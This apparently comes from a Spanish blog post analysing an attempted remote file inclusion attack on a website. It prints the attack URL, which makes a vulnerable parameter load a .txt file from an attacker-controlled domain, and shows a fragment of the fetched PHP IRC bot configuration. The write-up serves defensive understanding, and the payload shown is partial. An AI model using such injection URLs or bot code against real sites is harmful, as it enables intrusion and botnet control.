Hace unos días un conocido me comentó que alguien había intentado acceder a su web y había tratado inyectar una URL, pero la forma de hacerlo no tenía sentido. Me llamó la atención y le dije que me enviase ejemplos de lo que habían tratado de hacer.
Intento de explotación de un LFI:
www.dominiovictima.com/gratis//appserv/main.php?appserv_root=http://www.dominiocontroladoporelatacante.com/e107_themes/temp/remote/j1.txt
Analizando la URL atacada podemos ver dos partes claramente diferenciadas, la url víctima y la inyección, en esta última vemos otra URL que contiene un archivo .txt:
/appserv/main.php?appserv_root=http://www.dominiocontroladoporelatacante.com/e107_themes/temp/remote/j1.txt
Vamos a ver el contenido de ese
sospechoso txt que podeis encontrar aqui:
<?php
var $config = array("server"=>"irc.dominio.net",
"port"=>"6667",
"pass"=>"",
"prefix"=>"BoT",
"maxrand"=>"5",
"chan"=>"#channel",
"chan2"=>"#channel",
"key"=>"senhadocanal",
"modes"=>"+p",
"password"=>"terpmak",
"trigger"=>".",
"hostauth"=>"127.0.0.1"
);
?>
A simple vista lo primero que llama la atención son tres cosas, una cabecera bastante descriptiva de lo que hace el script, unas líneas de configuración y un footer con el nombre de una comunidad.